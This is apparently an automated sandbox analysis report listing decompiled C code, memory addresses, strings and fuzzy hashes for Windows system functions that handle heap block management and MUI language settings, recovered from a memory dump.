Uniqueness Score: -1.00%

Function 015E3D34, Relevance: 6.7, Strings: 5, Instructions: 435
COMMON

Download Yara Rule

C-Code - Quality: 96%

			E015E3D34(signed int* __ecx) {
				signed int* _v8;
				char _v12;
				signed int* _v16;
				signed int* _v20;
				char _v24;
				signed int _v28;
				signed int _v32;
				char _v36;
				signed int _v40;
				signed int _v44;
				signed int* _v48;
				signed int* _v52;
				signed int _v56;
				signed int _v60;
				char _v68;
				signed int _t140;
				signed int _t161;
				signed int* _t236;
				signed int* _t242;
				signed int* _t243;
				signed int* _t244;
				signed int* _t245;
				signed int _t255;
				void* _t257;
				signed int _t260;
				void* _t262;
				signed int _t264;
				void* _t267;
				signed int _t275;
				signed int* _t276;
				short* _t277;
				signed int* _t278;
				signed int* _t279;
				signed int* _t280;
				short* _t281;
				signed int* _t282;
				short* _t283;
				signed int* _t284;
				void* _t285;

				_v60 = _v60 | 0xffffffff;
				_t280 = 0;
				_t242 = __ecx;
				_v52 = __ecx;
				_v8 = 0;
				_v20 = 0;
				_v40 = 0;
				_v28 = 0;
				_v32 = 0;
				_v44 = 0;
				_v56 = 0;
				_t275 = 0;
				_v16 = 0;
				if(__ecx == 0) {
					_t280 = 0xc000000d;
					_t140 = 0;
					L50:
					 *_t242 =  *_t242 | 0x00000800;
					_t242[0x13] = _t140;
					_t242[0x16] = _v40;
					_t242[0x18] = _v28;
					_t242[0x14] = _v32;
					_t242[0x17] = _t275;
					_t242[0x15] = _v44;
					_t242[0x11] = _v56;
					_t242[0x12] = _v60;
					return _t280;
				}
				if(E015E1B8F(L"WindowsExcludedProcs",  &_v36,  &_v12,  &_v8) >= 0) {
					_v56 = 1;
					if(_v8 != 0) {
						L015F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v8);
					}
					_v8 = _t280;
				}
				if(E015E1B8F(L"Kernel-MUI-Number-Allowed",  &_v36,  &_v12,  &_v8) >= 0) {
					_v60 =  *_v8;
					L015F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v8);
					_v8 = _t280;
				}
				if(E015E1B8F(L"Kernel-MUI-Language-Allowed",  &_v36,  &_v12,  &_v8) < 0) {
					L16:
					if(E015E1B8F(L"Kernel-MUI-Language-Disallowed",  &_v36,  &_v12,  &_v8) < 0) {
						L28:
						if(E015E1B8F(L"Kernel-MUI-Language-SKU",  &_v36,  &_v12,  &_v8) < 0) {
							L46:
							_t275 = _v16;
							L47:
							_t161 = 0;
							L48:
							if(_v8 != 0) {
								L015F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t161, _v8);
							}
							_t140 = _v20;
							if(_t140 != 0) {
								if(_t275 != 0) {
									L015F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t275);
									_t275 = 0;
									_v28 = 0;
									_t140 = _v20;
								}
							}
							goto L50;
						}
						_t167 = _v12;
						_t255 = _v12 + 4;
						_v44 = _t255;
						if(_t255 == 0) {
							_t276 = _t280;
							_v32 = _t280;
						} else {
							_t276 = L015F4620(_t255,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t255);
							_t167 = _v12;
							_v32 = _t276;
						}
						if(_t276 == 0) {
							_v44 = _t280;
							_t280 = 0xc0000017;
							goto L46;
						} else {
							E0161F3E0(_t276, _v8, _t167);
							_v48 = _t276;
							_t277 = E01621370(_t276, 0x15b4e90);
							_pop(_t257);
							if(_t277 == 0) {
								L38:
								_t170 = _v48;
								if( *_v48 != 0) {
									E0161BB40(0,  &_v68, _t170);
									if(L015E43C0( &_v68,  &_v24) != 0) {
										_t280 =  &(_t280[0]);
									}
								}
								if(_t280 == 0) {
									_t280 = 0;
									L015F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v32);
									_v44 = 0;
									_v32 = 0;
								} else {
									_t280 = 0;
								}
								_t174 = _v8;
								if(_v8 != 0) {
									L015F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t174);
								}
								_v8 = _t280;
								goto L46;
							}
							_t243 = _v48;
							do {
								 *_t277 = 0;
								_t278 = _t277 + 2;
								E0161BB40(_t257,  &_v68, _t243);
								if(L015E43C0( &_v68,  &_v24) != 0) {
									_t280 =  &(_t280[0]);
								}
								_t243 = _t278;
								_t277 = E01621370(_t278, 0x15b4e90);
								_pop(_t257);
							} while (_t277 != 0);
							_v48 = _t243;
							_t242 = _v52;
							goto L38;
						}
					}
					_t191 = _v12;
					_t260 = _v12 + 4;
					_v28 = _t260;
					if(_t260 == 0) {
						_t275 = _t280;
						_v16 = _t280;
					} else {
						_t275 = L015F4620(_t260,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t260);
						_t191 = _v12;
						_v16 = _t275;
					}
					if(_t275 == 0) {
						_v28 = _t280;
						_t280 = 0xc0000017;
						goto L47;
					} else {
						E0161F3E0(_t275, _v8, _t191);
						_t285 = _t285 + 0xc;
						_v48 = _t275;
						_t279 = _t280;
						_t281 = E01621370(_v16, 0x15b4e90);
						_pop(_t262);
						if(_t281 != 0) {
							_t244 = _v48;
							do {
								 *_t281 = 0;
								_t282 = _t281 + 2;
								E0161BB40(_t262,  &_v68, _t244);
								if(L015E43C0( &_v68,  &_v24) != 0) {
									_t279 =  &(_t279[0]);
								}
								_t244 = _t282;
								_t281 = E01621370(_t282, 0x15b4e90);
								_pop(_t262);
							} while (_t281 != 0);
							_v48 = _t244;
							_t242 = _v52;
						}
						_t201 = _v48;
						_t280 = 0;
						if( *_v48 != 0) {
							E0161BB40(_t262,  &_v68, _t201);
							if(L015E43C0( &_v68,  &_v24) != 0) {
								_t279 =  &(_t279[0]);
							}
						}
						if(_t279 == 0) {
							L015F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v16);
							_v28 = _t280;
							_v16 = _t280;
						}
						_t202 = _v8;
						if(_v8 != 0) {
							L015F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t202);
						}
						_v8 = _t280;
						goto L28;
					}
				}
				_t214 = _v12;
				_t264 = _v12 + 4;
				_v40 = _t264;
				if(_t264 == 0) {
					_v20 = _t280;
				} else {
					_t236 = L015F4620(_t264,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t264);
					_t280 = _t236;
					_v20 = _t236;
					_t214 = _v12;
				}
				if(_t280 == 0) {
					_t161 = 0;
					_t280 = 0xc0000017;
					_v40 = 0;
					goto L48;
				} else {
					E0161F3E0(_t280, _v8, _t214);
					_t285 = _t285 + 0xc;
					_v48 = _t280;
					_t283 = E01621370(_t280, 0x15b4e90);
					_pop(_t267);
					if(_t283 != 0) {
						_t245 = _v48;
						do {
							 *_t283 = 0;
							_t284 = _t283 + 2;
							E0161BB40(_t267,  &_v68, _t245);
							if(L015E43C0( &_v68,  &_v24) != 0) {
								_t275 = _t275 + 1;
							}
							_t245 = _t284;
							_t283 = E01621370(_t284, 0x15b4e90);
							_pop(_t267);
						} while (_t283 != 0);
						_v48 = _t245;
						_t242 = _v52;
					}
					_t224 = _v48;
					_t280 = 0;
					if( *_v48 != 0) {
						E0161BB40(_t267,  &_v68, _t224);
						if(L015E43C0( &_v68,  &_v24) != 0) {
							_t275 = _t275 + 1;
						}
					}
					if(_t275 == 0) {
						L015F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v20);
						_v40 = _t280;
						_v20 = _t280;
					}
					_t225 = _v8;
					if(_v8 != 0) {
						L015F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t225);
					}
					_v8 = _t280;
					goto L16;
				}
			}

0x015e3d3c
0x015e3d42
0x015e3d44
0x015e3d46
0x015e3d49
0x015e3d4c
0x015e3d4f
0x015e3d52
0x015e3d55
0x015e3d58
0x015e3d5b
0x015e3d5f
0x015e3d61
0x015e3d66
0x01638213
0x01638218
0x015e4085
0x015e4088
0x015e408e
0x015e4094
0x015e409a
0x015e40a0
0x015e40a6
0x015e40a9
0x015e40af
0x015e40b6
0x015e40bd
0x015e40bd
0x015e3d83
0x0163821f
0x01638229
0x01638238
0x01638238
0x0163823d
0x0163823d
0x015e3da0
0x015e3daf
0x015e3db5
0x015e3dba
0x015e3dba
0x015e3dd4
0x015e3e94
0x015e3eab
0x015e3f6d
0x015e3f84
0x015e406b
0x015e406b
0x015e406e
0x015e406e
0x015e4070
0x015e4074
0x01638351
0x01638351
0x015e407a
0x015e407f
0x0163835d
0x01638370
0x01638377
0x01638379
0x0163837c
0x0163837c
0x0163835d
0x00000000
0x015e407f
0x015e3f8a
0x015e3f8d
0x015e3f90
0x015e3f95
0x0163830d
0x0163830f
0x015e3f9b
0x015e3fac
0x015e3fae
0x015e3fb1
0x015e3fb1
0x015e3fb6
0x01638317
0x0163831a
0x00000000
0x015e3fbc
0x015e3fc1
0x015e3fc9
0x015e3fd7
0x015e3fda
0x015e3fdd
0x015e4021
0x015e4021
0x015e4029
0x015e4030
0x015e4044
0x015e4046
0x015e4046
0x015e4044
0x015e4049
0x01638327
0x01638334
0x01638339
0x0163833c
0x015e404f
0x015e404f
0x015e404f
0x015e4051
0x015e4056
0x015e4063
0x015e4063
0x015e4068
0x00000000
0x015e4068
0x015e3fdf
0x015e3fe2
0x015e3fe4
0x015e3fe7
0x015e3fef
0x015e4003
0x015e4005
0x015e4005
0x015e400c
0x015e4013
0x015e4016
0x015e4017
0x015e401b
0x015e401e
0x00000000
0x015e401e
0x015e3fb6
0x015e3eb1
0x015e3eb4
0x015e3eb7
0x015e3ebc
0x016382a9
0x016382ab
0x015e3ec2
0x015e3ed3
0x015e3ed5
0x015e3ed8
0x015e3ed8
0x015e3edd
0x016382b3
0x016382b6
0x00000000
0x015e3ee3
0x015e3ee8
0x015e3eed
0x015e3ef0
0x015e3ef3
0x015e3f02
0x015e3f05
0x015e3f08
0x016382c0
0x016382c3
0x016382c5
0x016382c8
0x016382d0
0x016382e4
0x016382e6
0x016382e6
0x016382ed
0x016382f4
0x016382f7
0x016382f8
0x016382fc
0x016382ff
0x016382ff
0x015e3f0e
0x015e3f11
0x015e3f16
0x015e3f1d
0x015e3f31
0x01638307
0x01638307
0x015e3f31
0x015e3f39
0x015e3f48
0x015e3f4d
0x015e3f50
0x015e3f50
0x015e3f53
0x015e3f58
0x015e3f65
0x015e3f65
0x015e3f6a
0x00000000
0x015e3f6a
0x015e3edd
0x015e3dda
0x015e3ddd
0x015e3de0
0x015e3de5
0x01638245
0x015e3deb
0x015e3df7
0x015e3dfc
0x015e3dfe
0x015e3e01
0x015e3e01
0x015e3e06
0x0163824d
0x0163824f
0x01638254
0x00000000
0x015e3e0c
0x015e3e11
0x015e3e16
0x015e3e19
0x015e3e29
0x015e3e2c
0x015e3e2f
0x0163825c
0x0163825f
0x01638261
0x01638264
0x0163826c
0x01638280
0x01638282
0x01638282
0x01638289
0x01638290
0x01638293
0x01638294
0x01638298
0x0163829b
0x0163829b
0x015e3e35
0x015e3e38
0x015e3e3d
0x015e3e44
0x015e3e58
0x016382a3
0x016382a3
0x015e3e58
0x015e3e60
0x015e3e6f
0x015e3e74
0x015e3e77
0x015e3e77
0x015e3e7a
0x015e3e7f
0x015e3e8c
0x015e3e8c
0x015e3e91
0x00000000
0x015e3e91

Strings

Kernel-MUI-Language-Disallowed, xrefs: 015E3E97
Kernel-MUI-Language-SKU, xrefs: 015E3F70
Kernel-MUI-Language-Allowed, xrefs: 015E3DC0
Kernel-MUI-Number-Allowed, xrefs: 015E3D8C
WindowsExcludedProcs, xrefs: 015E3D6F

Memory Dump Source

Source File: 00000005.00000002.390845850.00000000015B0000.00000040.00000001.sdmp, Offset: 015B0000, based on PE: true

Similarity

API ID:
String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
API String ID: 0-258546922
Opcode ID: 37e5aa830e47225a08afd4ab42e1a4d8f823b059df4fd269f73579cb65808140
Instruction ID: 89fc203c867ba29e71e8d83176fede2edbe343ac7942902cc6c17a6de6cff4f5
Opcode Fuzzy Hash: 37e5aa830e47225a08afd4ab42e1a4d8f823b059df4fd269f73579cb65808140
Instruction Fuzzy Hash: E7F13A72D0061AEFCB15DF98C984AEEBBF9FF48650F14456AE505EB211E7349E01CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 015D40E1, Relevance: 6.3, Strings: 5, Instructions: 51
COMMON

Download Yara Rule

C-Code - Quality: 29%

			E015D40E1(void* __edx) {
				void* _t19;
				void* _t29;

				_t28 = _t19;
				_t29 = __edx;
				if( *((intOrPtr*)(_t19 + 0x60)) != 0xeeffeeff) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push("HEAP: ");
						E015DB150();
					} else {
						E015DB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E015DB150("Invalid heap signature for heap at %p", _t28);
					if(_t29 != 0) {
						E015DB150(", passed to %s", _t29);
					}
					_push("\n");
					E015DB150();
					if( *((char*)( *[fs:0x30] + 2)) != 0) {
						 *0x16c6378 = 1;
						asm("int3");
						 *0x16c6378 = 0;
					}
					return 0;
				}
				return 1;
			}

0x015d40e6
0x015d40e8
0x015d40f1
0x0163042d
0x0163044c
0x01630451
0x0163042f
0x01630444
0x01630449
0x0163045d
0x01630466
0x0163046e
0x01630474
0x01630475
0x0163047a
0x0163048a
0x0163048c
0x01630493
0x01630494
0x01630494
0x00000000
0x0163049b
0x00000000

Strings

HEAP[%wZ]: , xrefs: 0163043F
, passed to %s, xrefs: 01630469
HEAP: , xrefs: 0163044C
Invalid heap signature for heap at %p, xrefs: 01630458
RtlAllocateHeap, xrefs: 01630468

Memory Dump Source

Source File: 00000005.00000002.390845850.00000000015B0000.00000040.00000001.sdmp, Offset: 015B0000, based on PE: true

Similarity

API ID:
String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlAllocateHeap
API String ID: 0-188067316
Opcode ID: b4c8fa77d70b4c6ce1543a2965120aea326f573144676e17133f06830ca15dd6
Instruction ID: 004d25fdbf6638c21221a297512fa4ac33496f9ee1f5d583723c66310cd9711e
Opcode Fuzzy Hash: b4c8fa77d70b4c6ce1543a2965120aea326f573144676e17133f06830ca15dd6
Instruction Fuzzy Hash: 7801B532105643EED23997ADE85DBA277F4FB81A30F19806DF0094F742CAA49544C315

Uniqueness

Uniqueness Score: -1.00%

Function 015FA830, Relevance: 5.4, Strings: 4, Instructions: 350
COMMONCrypto

Download Yara Rule

C-Code - Quality: 70%

			E015FA830(intOrPtr __ecx, signed int __edx, signed short _a4) {
				void* _v5;
				signed short _v12;
				intOrPtr _v16;
				signed int _v20;
				signed short _v24;
				signed short _v28;
				signed int _v32;
				signed short _v36;
				signed int _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				signed short* _v52;
				void* __ebx;
				void* __edi;
				void* __ebp;
				signed int _t131;
				signed char _t134;
				signed int _t138;
				char _t141;
				signed short _t142;
				void* _t146;
				signed short _t147;
				intOrPtr* _t149;
				intOrPtr _t156;
				signed int _t167;
				signed int _t168;
				signed short* _t173;
				signed short _t174;
				intOrPtr* _t182;
				signed short _t184;
				intOrPtr* _t187;
				intOrPtr _t197;
				intOrPtr _t206;
				intOrPtr _t210;
				signed short _t211;
				intOrPtr* _t212;
				signed short _t214;
				signed int _t216;
				intOrPtr _t217;
				signed char _t225;
				signed short _t235;
				signed int _t237;
				intOrPtr* _t238;
				signed int _t242;
				unsigned int _t245;
				signed int _t251;
				intOrPtr* _t252;
				signed int _t253;
				intOrPtr* _t255;
				signed int _t256;
				void* _t257;
				void* _t260;

				_t256 = __edx;
				_t206 = __ecx;
				_t235 = _a4;
				_v44 = __ecx;
				_v24 = _t235;
				if(_t235 == 0) {
					L41:
					return _t131;
				}
				_t251 = ( *(__edx + 4) ^  *(__ecx + 0x54)) & 0x0000ffff;
				if(_t251 == 0) {
					__eflags =  *0x16c8748 - 1;
					if( *0x16c8748 >= 1) {
						__eflags =  *(__edx + 2) & 0x00000008;
						if(( *(__edx + 2) & 0x00000008) == 0) {
							_t110 = _t256 + 0xfff; // 0xfe7
							__eflags = (_t110 & 0xfffff000) - __edx;
							if((_t110 & 0xfffff000) != __edx) {
								_t197 =  *[fs:0x30];
								__eflags =  *(_t197 + 0xc);
								if( *(_t197 + 0xc) == 0) {
									_push("HEAP: ");
									E015DB150();
									_t260 = _t257 + 4;
								} else {
									E015DB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
									_t260 = _t257 + 8;
								}
								_push("((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock))");
								E015DB150();
								_t257 = _t260 + 4;
								__eflags =  *0x16c7bc8;
								if(__eflags == 0) {
									E01692073(_t206, 1, _t251, __eflags);
								}
								_t235 = _v24;
							}
						}
					}
				}
				_t134 =  *((intOrPtr*)(_t256 + 6));
				if(_t134 == 0) {
					_t210 = _t206;
					_v48 = _t206;
				} else {
					_t210 = (_t256 & 0xffff0000) - ((_t134 & 0x000000ff) << 0x10) + 0x10000;
					_v48 = _t210;
				}
				_v5 =  *(_t256 + 2);
				do {
					if(_t235 > 0xfe00) {
						_v12 = 0xfe00;
						__eflags = _t235 - 0xfe01;
						if(_t235 == 0xfe01) {
							_v12 = 0xfdf0;
						}
						_t138 = 0;
					} else {
						_v12 = _t235 & 0x0000ffff;
						_t138 = _v5;
					}
					 *(_t256 + 2) = _t138;
					 *(_t256 + 4) =  *(_t206 + 0x54) ^ _t251;
					_t236 =  *((intOrPtr*)(_t210 + 0x18));
					if( *((intOrPtr*)(_t210 + 0x18)) == _t210) {
						_t141 = 0;
					} else {
						_t141 = (_t256 - _t210 >> 0x10) + 1;
						_v40 = _t141;
						if(_t141 >= 0xfe) {
							_push(_t210);
							E0169A80D(_t236, _t256, _t210, 0);
							_t141 = _v40;
						}
					}
					 *(_t256 + 2) =  *(_t256 + 2) & 0x000000f0;
					 *((char*)(_t256 + 6)) = _t141;
					_t142 = _v12;
					 *_t256 = _t142;
					 *(_t256 + 3) = 0;
					_t211 = _t142 & 0x0000ffff;
					 *((char*)(_t256 + 7)) = 0;
					_v20 = _t211;
					if(( *(_t206 + 0x40) & 0x00000040) != 0) {
						_t119 = _t256 + 0x10; // -8
						E0162D5E0(_t119, _t211 * 8 - 0x10, 0xfeeefeee);
						 *(_t256 + 2) =  *(_t256 + 2) | 0x00000004;
						_t211 = _v20;
					}
					_t252 =  *((intOrPtr*)(_t206 + 0xb4));
					if(_t252 == 0) {
						L56:
						_t212 =  *((intOrPtr*)(_t206 + 0xc0));
						_t146 = _t206 + 0xc0;
						goto L19;
					} else {
						if(_t211 <  *((intOrPtr*)(_t252 + 4))) {
							L15:
							_t185 = _t211;
							goto L17;
						} else {
							while(1) {
								_t187 =  *_t252;
								if(_t187 == 0) {
									_t185 =  *((intOrPtr*)(_t252 + 4)) - 1;
									__eflags =  *((intOrPtr*)(_t252 + 4)) - 1;
									goto L17;
								}
								_t252 = _t187;
								if(_t211 >=  *((intOrPtr*)(_t252 + 4))) {
									continue;
								}
								goto L15;
							}
							while(1) {
								L17:
								_t212 = E015FAB40(_t206, _t252, 1, _t185, _t211);
								if(_t212 != 0) {
									_t146 = _t206 + 0xc0;
									break;
								}
								_t252 =  *_t252;
								_t211 = _v20;
								_t185 =  *(_t252 + 0x14);
							}
							L19:
							if(_t146 != _t212) {
								_t237 =  *(_t206 + 0x4c);
								_t253 = _v20;
								while(1) {
									__eflags = _t237;
									if(_t237 == 0) {
										_t147 =  *(_t212 - 8) & 0x0000ffff;
									} else {
										_t184 =  *(_t212 - 8);
										_t237 =  *(_t206 + 0x4c);
										__eflags = _t184 & _t237;
										if((_t184 & _t237) != 0) {
											_t184 = _t184 ^  *(_t206 + 0x50);
											__eflags = _t184;
										}
										_t147 = _t184 & 0x0000ffff;
									}
									__eflags = _t253 - (_t147 & 0x0000ffff);
									if(_t253 <= (_t147 & 0x0000ffff)) {
										goto L20;
									}
									_t212 =  *_t212;
									__eflags = _t206 + 0xc0 - _t212;
									if(_t206 + 0xc0 != _t212) {
										continue;
									} else {
										goto L20;
									}
									goto L56;
								}
							}
							L20:
							_t149 =  *((intOrPtr*)(_t212 + 4));
							_t33 = _t256 + 8; // -16
							_t238 = _t33;
							_t254 =  *_t149;
							if( *_t149 != _t212) {
								_push(_t212);
								E0169A80D(0, _t212, 0, _t254);
							} else {
								 *_t238 = _t212;
								 *((intOrPtr*)(_t238 + 4)) = _t149;
								 *_t149 = _t238;
								 *((intOrPtr*)(_t212 + 4)) = _t238;
							}
							 *((intOrPtr*)(_t206 + 0x74)) =  *((intOrPtr*)(_t206 + 0x74)) + ( *_t256 & 0x0000ffff);
							_t255 =  *((intOrPtr*)(_t206 + 0xb4));
							if(_t255 == 0) {
								L36:
								if( *(_t206 + 0x4c) != 0) {
									 *(_t256 + 3) =  *(_t256 + 1) ^  *(_t256 + 2) ^  *_t256;
									 *_t256 =  *_t256 ^  *(_t206 + 0x50);
								}
								_t210 = _v48;
								_t251 = _v12 & 0x0000ffff;
								_t131 = _v20;
								_t235 = _v24 - _t131;
								_v24 = _t235;
								_t256 = _t256 + _t131 * 8;
								if(_t256 >=  *((intOrPtr*)(_t210 + 0x28))) {
									goto L41;
								} else {
									goto L39;
								}
							} else {
								_t216 =  *_t256 & 0x0000ffff;
								_v28 = _t216;
								if(_t216 <  *((intOrPtr*)(_t255 + 4))) {
									L28:
									_t242 = _t216 -  *((intOrPtr*)(_t255 + 0x14));
									_v32 = _t242;
									if( *((intOrPtr*)(_t255 + 8)) != 0) {
										_t167 = _t242 + _t242;
									} else {
										_t167 = _t242;
									}
									 *((intOrPtr*)(_t255 + 0xc)) =  *((intOrPtr*)(_t255 + 0xc)) + 1;
									_t168 = _t167 << 2;
									_v40 = _t168;
									_t206 = _v44;
									_v16 =  *((intOrPtr*)(_t168 +  *((intOrPtr*)(_t255 + 0x20))));
									if(_t216 ==  *((intOrPtr*)(_t255 + 4)) - 1) {
										 *((intOrPtr*)(_t255 + 0x10)) =  *((intOrPtr*)(_t255 + 0x10)) + 1;
									}
									_t217 = _v16;
									if(_t217 != 0) {
										_t173 = _t217 - 8;
										_v52 = _t173;
										_t174 =  *_t173;
										__eflags =  *(_t206 + 0x4c);
										if( *(_t206 + 0x4c) != 0) {
											_t245 =  *(_t206 + 0x50) ^ _t174;
											_v36 = _t245;
											_t225 = _t245 >> 0x00000010 ^ _t245 >> 0x00000008 ^ _t245;
											__eflags = _t245 >> 0x18 - _t225;
											if(_t245 >> 0x18 != _t225) {
												_push(_t225);
												E0169A80D(_t206, _v52, 0, 0);
											}
											_t174 = _v36;
											_t217 = _v16;
											_t242 = _v32;
										}
										_v28 = _v28 - (_t174 & 0x0000ffff);
										__eflags = _v28;
										if(_v28 > 0) {
											goto L34;
										} else {
											goto L33;
										}
									} else {
										L33:
										_t58 = _t256 + 8; // -16
										 *((intOrPtr*)(_v40 +  *((intOrPtr*)(_t255 + 0x20)))) = _t58;
										_t206 = _v44;
										_t217 = _v16;
										L34:
										if(_t217 == 0) {
											asm("bts eax, edx");
										}
										goto L36;
									}
								} else {
									goto L24;
								}
								while(1) {
									L24:
									_t182 =  *_t255;
									if(_t182 == 0) {
										_t216 =  *((intOrPtr*)(_t255 + 4)) - 1;
										__eflags = _t216;
										goto L28;
									}
									_t255 = _t182;
									if(_t216 >=  *((intOrPtr*)(_t255 + 4))) {
										continue;
									} else {
										goto L28;
									}
								}
								goto L28;
							}
						}
					}
					L39:
				} while (_t235 != 0);
				_t214 = _v12;
				_t131 =  *(_t206 + 0x54) ^ _t214;
				 *(_t256 + 4) = _t131;
				if(_t214 == 0) {
					__eflags =  *0x16c8748 - 1;
					if( *0x16c8748 >= 1) {
						_t127 = _t256 + 0xfff; // 0xfff
						_t131 = _t127 & 0xfffff000;
						__eflags = _t131 - _t256;
						if(_t131 != _t256) {
							_t156 =  *[fs:0x30];
							__eflags =  *(_t156 + 0xc);
							if( *(_t156 + 0xc) == 0) {
								_push("HEAP: ");
								E015DB150();
							} else {
								E015DB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
							}
							_push("ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock");
							_t131 = E015DB150();
							__eflags =  *0x16c7bc8;
							if(__eflags == 0) {
								_t131 = E01692073(_t206, 1, _t251, __eflags);
							}
						}
					}
				}
				goto L41;
			}

0x015fa83a
0x015fa83c
0x015fa83e
0x015fa841
0x015fa844
0x015fa84a
0x015faa53
0x015faa59
0x015faa59
0x015fa858
0x015fa85e
0x015faaf5
0x015faafc
0x0164229e
0x016422a2
0x016422a8
0x016422b3
0x016422b5
0x016422bb
0x016422c1
0x016422c5
0x016422e6
0x016422eb
0x016422f0
0x016422c7
0x016422dc
0x016422e1
0x016422e1
0x016422f3
0x016422f8
0x016422fd
0x01642300
0x01642307
0x0164230e
0x0164230e
0x01642313
0x01642313
0x016422b5
0x016422a2
0x015faafc
0x015fa864
0x015fa869
0x015faa5c
0x015faa5e
0x015fa86f
0x015fa87f
0x015fa885
0x015fa885
0x015fa88b
0x015fa890
0x015fa896
0x015fab0c
0x015fab0f
0x015fab15
0x01642320
0x01642320
0x015fab1b
0x015fa89c
0x015fa89f
0x015fa8a2
0x015fa8a2
0x015fa8a5
0x015fa8af
0x015fa8b3
0x015fa8b8
0x015faa66
0x015fa8be
0x015fa8c5
0x015fa8c6
0x015fa8ce
0x01642328
0x01642332
0x01642337
0x01642337
0x015fa8ce
0x015fa8d4
0x015fa8d8
0x015fa8db
0x015fa8de
0x015fa8e1
0x015fa8e5
0x015fa8e8
0x015fa8f0
0x015fa8f3
0x0164234c
0x01642350
0x01642355
0x01642359
0x01642359
0x015fa8f9
0x015fa901
0x015faae4
0x015faae4
0x015faaea
0x00000000
0x015fa907
0x015fa90a
0x015fa91d
0x015fa91d
0x00000000
0x015fa910
0x015fa910
0x015fa910
0x015fa914
0x015fa924
0x015fa924
0x015fa924
0x015fa924
0x015fa916
0x015fa91b
0x00000000
0x00000000
0x00000000
0x015fa91b
0x015fa925
0x015fa925
0x015fa932
0x015fa936
0x015fa93c
0x015fa93c
0x015fa93c
0x015fab22
0x015fab24
0x015fab27
0x015fab27
0x015fa942
0x015fa944
0x015faaba
0x015faabd
0x015faac0
0x015faac0
0x015faac2
0x015fab2f
0x015faac4
0x015faac4
0x015faac7
0x015faaca
0x015faacc
0x015faace
0x015faace
0x015faace
0x015faad1
0x015faad1
0x015faad7
0x015faad9
0x00000000
0x00000000
0x01642361
0x01642369
0x0164236b
0x00000000
0x01642371
0x00000000
0x01642371
0x00000000
0x0164236b
0x015faac0
0x015fa94a
0x015fa94a
0x015fa94d
0x015fa94d
0x015fa950
0x015fa954
0x01642376
0x01642380
0x015fa95a
0x015fa95a
0x015fa95c
0x015fa95f
0x015fa961
0x015fa961
0x015fa967
0x015fa96a
0x015fa972
0x015faa02
0x015faa06
0x015faa10
0x015faa16
0x015faa16
0x015faa1b
0x015faa21
0x015faa24
0x015faa27
0x015faa29
0x015faa2c
0x015faa32
0x00000000
0x00000000
0x00000000
0x00000000
0x015fa978
0x015fa978
0x015fa97b
0x015fa981
0x015fa996
0x015fa998
0x015fa99f
0x015fa9a2
0x0164238a
0x015fa9a8
0x015fa9a8
0x015fa9a8
0x015fa9aa
0x015fa9ad
0x015fa9b0
0x015fa9bb
0x015fa9be
0x015fa9c7
0x015fa9c9
0x015fa9c9
0x015fa9cc
0x015fa9d1
0x015faa6d
0x015faa70
0x015faa73
0x015faa75
0x015faa79
0x015faa7e
0x015faa82
0x015faa8f
0x015faa94
0x015faa96
0x01642392
0x016423a1
0x016423a1
0x015faa9c
0x015faa9f
0x015faaa2
0x015faaa2
0x015faaa8
0x015faaab
0x015faaaf
0x00000000
0x015faab5
0x00000000
0x015faab5
0x015fa9d7
0x015fa9d7
0x015fa9da
0x015fa9e0
0x015fa9e3
0x015fa9e6
0x015fa9e9
0x015fa9eb
0x015fa9fd
0x015fa9fd
0x00000000
0x015fa9eb
0x00000000
0x00000000
0x00000000
0x015fa983
0x015fa983
0x015fa983
0x015fa987
0x015fa995
0x015fa995
0x015fa995
0x015fa995
0x015fa989
0x015fa98e
0x00000000
0x015fa990
0x00000000
0x015fa990
0x015fa98e
0x00000000
0x015fa983
0x015fa972
0x015fa90a
0x015faa34
0x015faa34
0x015faa40
0x015faa43
0x015faa46
0x015faa4d
0x016423ab
0x016423b2
0x016423b8
0x016423be
0x016423c3
0x016423c5
0x016423cb
0x016423d1
0x016423d5
0x016423f6
0x016423fb
0x016423d7
0x016423ec
0x016423f1
0x01642403
0x01642408
0x01642410
0x01642417
0x01642422
0x01642422
0x01642417
0x016423c5
0x016423b2
0x00000000

Strings

ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock, xrefs: 01642403
HEAP[%wZ]: , xrefs: 016422D7, 016423E7
HEAP: , xrefs: 016422E6, 016423F6
((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock)), xrefs: 016422F3

Memory Dump Source

Source File: 00000005.00000002.390845850.00000000015B0000.00000040.00000001.sdmp, Offset: 015B0000, based on PE: true

Similarity

API ID:
